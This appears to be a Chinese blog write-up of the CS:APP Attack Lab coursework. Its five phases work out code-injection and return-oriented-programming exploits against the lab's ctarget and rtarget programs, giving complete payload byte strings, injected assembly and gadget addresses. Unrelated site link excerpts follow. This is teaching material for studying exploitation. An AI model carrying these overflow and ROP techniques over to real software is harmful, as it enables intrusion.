计算机系统lab4_attack lab
Attack lab
实验概括
要求你进行五次攻击。攻击方式是code injection代码注入和Reeturn-oriented programming(ROP)
文件列表:
文件 | 用途 |
---|---|
ctarget | 用来做Code injection攻击的程序,phase1-3 |
rtarget | 用来做ROP攻击的程序,phase 4-5 |
cookie.txt | 作为攻击的标识符 |
hex2raw | 用来生成工具字符串 |
farm.c | 用于生成面向返回的编程攻击 |
预备知识——缓冲区溢出
缓冲区溢出的基本原理并不复杂。缓冲区就是操作系统为函数执行专门划分出的一段内存,包括栈(自动变量)、堆(动态内存)和静态数据区(全局或静态)。其中缓冲区溢出发生在栈里,栈存放了函数的参数、返回地址、EBP(EBP是当前函数的存取指针,即存储或者读取数时的指针基地址,可以看成一个标准的函数起始代码)和局部变量。
当函数中对局部变量的赋值超过了为其分配的存储空间,超出的部分就会覆盖栈里其他部分的数据,也就是发生了缓冲区溢出。
预备知识——ROP攻击
ROP攻击
缓冲区溢出攻击的普遍发生给计算机系统造成了许多麻烦。现代的编译器和操作系统实现了许多机制,以避免遭受这样的攻击,限制入侵者通过缓冲区溢出攻击获得系统控制的方式。
(1)栈随机化
栈随机化
的思想使得栈的位置在程序每次运行时都有变化。因此,即使许多机器都运行同样的代码,它们的栈地址都是不同的。上述3个阶段中,栈的地址是固定的,所以我们可以获取到栈的地址,并跳转到栈的指定位置。
(2)栈破坏检测
最近的GCC版本在产生的代码加入了一种栈保护者
机制,来检测缓冲区越界。其思想是在栈帧中任何局部缓冲区和栈状态之间存储一个特殊的金丝雀值。在恢复寄存器状态和从函数返回之前,程序检查这个金丝雀值是否被该函数的某个操作或者该函数调用的某个操作改变了。如果是的,那么程序异常中止。
(3)限制可执行代码区域
最后一招是消除攻击者向系统中插入可执行代码的能力。一种方法是限制哪些内存区域能够存放可执行代码。
在ROP攻击中,因为栈上限制了不可插入可执行代码,所以不能像上述第二、第三阶段中插入代码。所以我们需要在已经存在的程序中找到特定的指令序列,并且这些指令是以ret
结尾,这一段指令序列,我们称之为gadget
。
每一段gadget
包含一系列指令字节,而且以ret
结尾,跳转到下一个gadget
,就这样连续的执行一系列的指令代码,对程序造成攻击。
示例
void setval_210(unsigned *p)
{*p = 3347663060U;
}
对于上述代码,进行反汇编我们可以得到如下的执行序列,从中我们一个得到一个有趣指令序列:
0000000000400f15 <setval_210>:400f15: c7 07 d4 48 89 c7 movl $0xc78948d4,(%rdi)400f1b: c3 retq
其中,字节序列48 89 c7
是对指令movq %rax, %rdi
的编码,就这样我们可以利用已经存在的程序,从中提取出特定的指令,执行特定的功能,地址为0x400f18
,其功能是将%rax
的内容移到%rdi
。
指令的编码如下所示:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EKlnpPKi-1643207545641)(Attack_lab_img/1433829-d6312f1ce53cf044.png)]
movq指令编码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2zH1IS1e-1643207545642)(Attack_lab_img/1433829-2a663eb32fae331a.png)]
popq指令编码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VAdyiS15-1643207545642)(Attack_lab_img/1433829-c713c395456655fa.png)]
movl指令编码
实验开始
1) phase1
-
任务目标
让getbuf()函数返回touch1()
-
实验步骤
首先对ctarget进行gdb调试
然后对getbuf 进行反汇编
对touch1进行反汇编
可知getbuf()开辟了0x28,即40字节的空间,返回地址存在%rsp+0x28的地址,
而touch1的初始地址为0x004017c0
所以当我们存入缓冲区的数据,即touch1的初始地址可以覆盖这个返回地址时,我们就可以成功返回touch1了
攻击序列设置:
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00
以小端方式存储于1.txt中
用hex2raw转化为字符串,执行命令
./hex2raw <1.txt >2.txt
再执行
./ctarget -qi 2.txt
2) phase2
-
任务要求
要求程序执行完getbuf()后,执行touch2,而且还要传入参数,即你的cookie
-
实验步骤
反汇编查看touch2地址
要求我们把参数设置为cookie,即把%rdi的值改为cookie,再执行touch2. 即ret touch2的地址。
转化为汇编代码保存在1.s中,
movq $0x59b997fa,%rdi pushq $0x4017ec ret
用
gcc -c 1.s -o 1.o
指令转化为机器代码并将其反汇编,保存在2.txt中,2.txt如图
利用gdb调试,进入getbuf函数里,查看%rsp的地址
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RsN1kicB-1643207545646)(Attack_lab_img/image-20210412193826843.png)]
如上所示,我们获取到了%rsp的地址,结合上文所讲,可以构造出如下字符串,在栈的开始位置为注入代码的指令序列,然后填充满至40个字节,在接下来的8个字节,也就是原来的返回地址,填充成注入代码的起始地址,也就是%rsp的地址,可以得到如下字符串,保存在1.txt中
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EpE81n3C-1643207545647)(Attack_lab_img/1433829-fa485a0533812b76.png)]
利用raw2hex转化为字符串
./hex2raw <1.txt> 2.txt
再执行
./ctarget -qi 2.txt
3) phase3
-
任务要求
第三阶段,也是需要在输入的字符串中注入一段代码,但是不同于第二阶段的是,在这一阶段中我们需要将cookie转化为字符串作为参数。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W5wE9HwP-1643207545647)(Attack_lab_img/image-20210412202523955.png)]
-
实验步骤
我们首先构造注入代码,touch3的地址为0x4018fa,根据上一关我们已经得到的%rsp地址0x5561dc78,返回地址应为%rsp+0x28(保存代码执行地址的位置),然后字符串地址应为%rsp+0x30(48),即0x5561dca0.
所以注入代码为,保存在cs.s中
movq $0x5561dc98,%rdi pushq $0x004018fa retq
汇编和反汇编
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ygPN2fnj-1643207545648)(Attack_lab_img/image-20210412203205921.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gqVgm4ZW-1643207545648)(Attack_lab_img/image-20210412203220388.png)]
利用man ascii将cookie转化为16进制
35 39 62 39 39 37 66 61 00
所以,注入序列为:
48 c7 c7 a8 dc 61 55 68 fa 18 40 00 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 dc 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00
将其保存在touch_3.txt中,执行指令,可得:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eEIkgy4J-1643207545649)(Attack_lab_img/image-20210412203956357.png)]
4) phase4
-
任务要求
在这一阶段中,我们其实是重复代码注入攻击中第二阶段的任务,劫持程序流,返回到
touch2
函数。只不过这个我们要做的是ROP攻击,这一阶段我们无法再像上一阶段中将指令序列放入到栈中,所以我们需要到现有的程序中,找到我们需要的指令序列。 -
实验步骤
我们需要的代码序列:
popq %rax movq %rax, %rdi
其指令编码为:
58 48 89 c7
在rtarget的反汇编代码中查找
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lxktkcol-1643207545649)(Attack_lab_img/image-20210412211719953.png)]
所以popq %rax指令起始地址为:0x4019ab
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dDJ3RSpd-1643207545649)(Attack_lab_img/image-20210412211839599.png)]
所以movq %rax, %rdi指令起始地址为:0x4019a2
所以得到字符串,保存在touch_4中:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ab 19 40 00 00 00 00 00 fa 97 b9 59 00 00 00 00 a2 19 40 00 00 00 00 00 ec 17 40 00 00 00 00 00
执行指令:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6F8gWQrh-1643207545650)(Attack_lab_img/image-20210412212407837.png)]
5) phase5
-
任务要求
在这一阶段中,我们需要做的就是把字符串的起始地址,传送到
%rdi
,然后调用touch3
函数。因为每次栈的位置是随机的,所以无法直接用地址来索引字符串的起始地址,只能用栈顶地址 + 偏移量来索引字符串的起始地址。从
farm
中我们可以获取到这样一个gadget
,lea (%rdi,%rsi,1),%rax
,这样就可以把字符串的首地址传送到%rax
。 -
实验步骤
解题思路:
(1)首先获取到
%rsp
的地址,并且传送到%rdi
(2)其二获取到字符串的偏移量值,并且传送到%rsi
(3)lea (%rdi,%rsi,1),%rax
, 将字符串的首地址传送到%rax
, 再传送到%rdi
(4)调用touch3
函数
(1) 第一步,获取到%rsp
的地址
0000000000401a03 <addval_190>:401a03: 8d 87 41 48 89 e0 lea -0x1f76b7bf(%rdi),%eax401a09: c3
movq %rsp, %rax的指令字节为:
48 89 e0, 所以这一步的
gadget地址为:
0x401a06
(2) 第二步,将%rax
的内容传送到%rdi
00000000004019a0 <addval_273>:4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax4019a6: c3
movq %rax, %rdi的指令字节为:
48 89 c7,所以这一步的
gadget地址为:
0x4019a2
(3) 第三步,将偏移量的内容弹出到%rax
00000000004019ca <getval_280>:4019ca: b8 29 58 90 c3 mov $0xc3905829,%eax4019cf: c3
popq %rax的指令字节为:
58, 其中
90为
nop指令, 所以这一步的
gadget地址为:
0x4019cc
(4) 第四步,将%eax
的内容传送到%edx
00000000004019db <getval_481>:4019db: b8 5c 89 c2 90 mov $0x90c2895c,%eax4019e0: c3
movl %eax, %edx的指令字节为:
89 c2, 所以这一步的
gadget地址为:
0x4019dd
(5) 第五步,将%edx
的内容传送到%ecx
0000000000401a6e <setval_167>:401a6e: c7 07 89 d1 91 c3 movl $0xc391d189,(%rdi)401a74: c3
movl %edx, %ecx的指令字节为:
89 d1,所以这一步的
gadget地址为:
0x401a70
(6) 第六步,将%ecx
的内容传送到%esi
0000000000401a11 <addval_436>:401a11: 8d 87 89 ce 90 90 lea -0x6f6f3177(%rdi),%eax401a17: c3 retq
movl %ecx, %esi的指令字节为:
89 ce, 所以这一步
gadget地址为:
0x401a13
(7) 第七步,将栈顶 + 偏移量得到字符串的首地址传送到%rax
00000000004019d6 <add_xy>:4019d6: 48 8d 04 37 lea (%rdi,%rsi,1),%rax4019da: c3 retq
这一步的gadget
地址为:0x4019d6
(8) 将字符串首地址%rax
传送到%rdi
00000000004019a0 <addval_273>:4019a0: 8d 87 48 89 c7 c3 lea -0x3c3876b8(%rdi),%eax4019a6: c3
movq %rax, %rdi的指令字节为:
48 89 c7,所以这一步的
gadget地址为:
0x4019a2
整个栈的结构如下:
所以要输入的字符串为:
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00
a2 19 40 00 00 00 00 00
cc 19 40 00 00 00 00 00
48 00 00 00 00 00 00 00
dd 19 40 00 00 00 00 00
70 1a 40 00 00 00 00 00
13 1a 40 00 00 00 00 00
d6 19 40 00 00 00 00 00
a2 19 40 00 00 00 00 00
fa 18 40 00 00 00 00 00
35 39 62 39 39 37 66 61 00
保存在touch_5.txt中,执行指令:
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- 三国志战略版:奸雄骑,不要奸雄
一、前言 奸雄骑一定需要奸雄才能玩吗?其实绝大多数人都是没有奸雄的,大丹这里专治缺胳膊少腿,,下面我们来看看不要奸雄的奸雄骑如何组。 二、思路分析 传统的奸雄骑,一般是这样组的,以及有一些变种&…...
2024/4/14 2:42:14 - 插件实现按照 ESLint 规则自动格式化
1. 需求插件 ESLint (读取 ESLint 配置文件进行语法检测)Prettier ESLint(按照 ESLint 配置文件进行格式化) 2. 修改默认格式化插件 2.1 找到任意代码文件 右键点击代码区域 选择「使用…格式化文档」 2.2 选择「配置默认格…...
2024/4/14 2:42:24 - 剑指offer45:把数组排成最小的数
一道字符串or说是数学题 1.暴力 啊,我们第一眼看过去会想,如果我们求出字符串的全排列再去排序选出最小的不就好了么,不过这样是O(n!)时间复杂度,这个恐怕得炸吧...... 2.数学证明排序 首先不管是书中还是解答里边都给出了一个…...
2024/4/7 17:40:52 - 面试题1.26
1.数据库语句是如何优化的? 查询语句中不要使用select *尽量减少子查询,使用连接查询减少使用 IN 或者 NOT IN,使用exists,not exists或者关联语句代替,left join 替换 in,between 替换 in ( 如果 in 的条…...
2024/4/14 2:42:34 - 【问题解决】This container is having trouble accessing https://k8s.gcr.io | 如何解决从k8s.gcr.io拉取镜像失败问题?
docker.io仓库对google的容器做了镜像,可以通过下列命令下拉取相关镜像: docker pull mirrorgooglecontainers/kube-apiserver-amd64:v1.11.3 docker pull mirrorgooglecontainers/kube-controller-manager-amd64:v1.11.3 docker pull mirrorgooglecont…...
2024/4/7 17:40:50 - LeetCode简单题之找不同
题目 给定两个字符串 s 和 t ,它们只包含小写字母。 字符串 t 由字符串 s 随机重排,然后在随机位置添加一个字母。 请找出在 t 中被添加的字母。 示例 1: 输入:s “abcd”, t “abcde” 输出:“e” 解释:…...
2024/4/14 2:42:24 - C++list类的模拟实现
本文是对之前list类的模拟实现的重制。 文章目录整体框架Alloc内存池iterator类iterator的意义iterator的实现operator&&拷贝析构iterator的三个模板参数operator->的编译器省略List的拷贝构造析构等list接口的基本实现string,vector,list的迭…...
2024/4/14 2:42:10 - 内存布局、堆空间、堆空间的初始化
内存布局 每个应用都有自己独立的内存空间,其内存空间一般都有以下几大区域: 代码段(代码区):用于存放代码。数据段(全局区):用于存放全局变量等。栈空间:每调用一个函…...
2024/4/18 21:29:58 - JAV练习题(Map双列集合)
1.利用Map,完成下面的功能: 从命令行读入一个字符串,表示一个年份,输出该年的世界杯冠军是哪支球队。如果该年没有举办世界杯,则输出:没有举办世界杯。 历届世界杯冠军 届数 举办年份 冠军 第一届 1930年 乌…...
2024/4/14 2:42:29 - 蓝桥杯学习笔记八:捕获计数器
一、什么是捕获计数器(说人话)? 比如说,我们想知道一个高电平输入到某引脚持续的时间(信号频率其实也是在求信号输入的持续时间),stm32里的定时器肯定是可以实现这一功能的。 我们刚所说的定时…...
2024/4/20 2:21:06 - 美赛 5:评价类模型、插值与拟合模型(十大模型篇)
目录 一、评价类模型 1.AHP(层次分析法) 2.TOPSIS法(优劣解距离方法) 二、插值与拟合模型 1.插值算法 2.拟合算法(cftool工具箱) 一、评价类模型 1.AHP(层次分析法) 最基础的…...
2024/4/14 2:42:29 - 【ArcGIS微课1000例】0022:ArcGIS点(点坐标)自动连成线操作案例教程
ArcGIS中,可以将带三维坐标(X、Y、Z)的点/点集自动连成线,本文演示具体操作流程。 文章目录 实战演练GPS点数据下载实战演练 打开ArcMap软件,添加实验文件夹0022下的GPS轨迹点.shp矢量点数据(文末提供下载地址),该数据是由GPS RTK采集的河道点数据,首先需要将GPS点坐…...
2024/4/14 2:42:19 - 计算机网络-传输层-总结
网络层 转发(Forward):路由(Routing):路由选择算法,转发表(forwarding table)链路层交换机(link-layer switches):链路层设备。根据链…...
2024/4/19 15:43:52 - 零基础Python爬虫教程,入门学习的三个阶段
爬虫Python入门好学吗? 学爬虫需要具备一定的Python基础,有编程基础学Python爬虫更容易学。但要多看多练,有自己的逻辑想法。用Python达到自己的学习目的才算有价值。如果是入门学习了解,开始学习不难,但深入学习有难…...
2024/4/25 11:46:24 - 第9期:C++与STL入门
本文讲解一些在ACM中C的应用。 1 algorithm头文件 swap()函数不仅同时支持int、double等所有内置类型,甚至还支持用户自己编写的结构体。 2 stringstream 参考:C编程语言中stringstream类介绍 例子:输入数据的每行包含若干个…...
2024/4/14 2:43:20 - String、StringBuilder、StringBuffer三者的区别 + <数字反转>算法问题详解
最近刷算法题,学到了很多关于字符串的知识,String类的题目还真是不简单,下面跟着bao小包同学来了解一下关于String、StringBuilder、StringBuffer三者之间的区别吧! 一、它们都是用来处理字符串的 二、主要区别在于两个方面&…...
2024/4/14 2:43:20 - springboot-请求映射源码分析
...
2024/4/14 2:42:50 - 阿里巴巴每平每屋能让家居家装在“元宇宙”里畅游?
文|智能相对论 作者|kinki 如果要问哪个行业离开互联网的距离最远,很多人会异口同声地回答是家居家装。品类复杂、非标化、信息不对称、行业壁垒深让使得家居家装成为了水最深的行业。 随着房地产的黄金时代已经渐行渐远,家装上下游的所有玩家都被倒逼…...
2024/4/18 6:56:49 - 网络流模型与技巧总结
文章目录前言常见基本模型最大匹配、最小点覆盖和最大独立集最大点权匹配最小路径覆盖不可重覆盖可重覆盖最大权闭合子图建图技巧利用拆点进行限流利用断边表示决策利用虚点表示组合关系链状模型通过拆点描述先后顺序改变边权实现双关键字优化技巧动态加点/加边优化更新残量网络…...
2024/4/7 17:40:39 - vue-cli,webpack的使用,vue-router路由,vue+elementuUI,vue中的嵌套路由(子路由),参数传递和重定向,路由模式、404和路由钩子
文章目录1.Vue-Cli1.1、Vue-Cli简介1.2、环境准备1.3 第一个vue-cli程序1.4webpack的使用2.vue-router路由2.1 安装2.2 测试路由3. vueelementuUI3.1 创建工程3.2 创建登录页面4. 嵌套路由(子路由)5. 参数传递和重定向5.1 参数传递5.2 重定向6 路由模式、…...
2024/4/18 13:52:02
最新文章
- Visual Studio 2022 工具 选项 没有网络设置问题解决
Visual Studio 2022 工具 选项 没有网络选项了,找了一大圈也没找到。 最后发现Visual Studio 2022的直接使用系统的代理设置了,在浏览器的代理中设置即可。 要使用扩展管理器安装插件,还不能设置pac !!! 顺便记录个pac地址: 1…...
2024/5/2 9:32:55 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/3/20 10:50:27 - Verilog基础【二】
3.1 Verilog 连续赋值 关键词:assign, 全加器 连续赋值语句是 Verilog 数据流建模的基本语句,用于对 wire 型变量进行赋值。: assign LHS_target RHS_expression ;LHS(left hand side)…...
2024/5/1 5:48:25 - C#-实现软删除
文章目录 前言1. 使用布尔字段标记删除状态2. 修改查询以忽略软删除的记录3. 实现软删除的方法4. 考虑使用全局查询过滤器5. 处理关联实体6. 考虑性能和存储软删除的好处:软删除的坏处: 总结 前言 后端中,经常使用软删除来标志删除一些数据。…...
2024/4/30 1:36:16 - 【外汇早评】美通胀数据走低,美元调整
原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...
2024/5/1 17:30:59 - 【原油贵金属周评】原油多头拥挤,价格调整
原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...
2024/4/30 18:14:14 - 【外汇周评】靓丽非农不及疲软通胀影响
原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...
2024/4/29 2:29:43 - 【原油贵金属早评】库存继续增加,油价收跌
原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...
2024/5/2 9:28:15 - 【外汇早评】日本央行会议纪要不改日元强势
原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...
2024/4/27 17:58:04 - 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响
原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...
2024/4/27 14:22:49 - 【外汇早评】美欲与伊朗重谈协议
原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...
2024/4/28 1:28:33 - 【原油贵金属早评】波动率飙升,市场情绪动荡
原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...
2024/4/30 9:43:09 - 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试
原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...
2024/4/27 17:59:30 - 【原油贵金属早评】市场情绪继续恶化,黄金上破
原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...
2024/4/25 18:39:16 - 【外汇早评】美伊僵持,风险情绪继续升温
原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...
2024/4/28 1:34:08 - 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势
原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...
2024/4/26 19:03:37 - 氧生福地 玩美北湖(上)——为时光守候两千年
原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...
2024/4/29 20:46:55 - 氧生福地 玩美北湖(中)——永春梯田里的美与鲜
原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...
2024/4/30 22:21:04 - 氧生福地 玩美北湖(下)——奔跑吧骚年!
原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...
2024/5/1 4:32:01 - 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!
原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...
2024/4/27 23:24:42 - 「发现」铁皮石斛仙草之神奇功效用于医用面膜
原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...
2024/4/28 5:48:52 - 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者
原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...
2024/4/30 9:42:22 - 广州械字号面膜生产厂家OEM/ODM4项须知!
原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...
2024/5/2 9:07:46 - 械字号医用眼膜缓解用眼过度到底有无作用?
原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...
2024/4/30 9:42:49 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
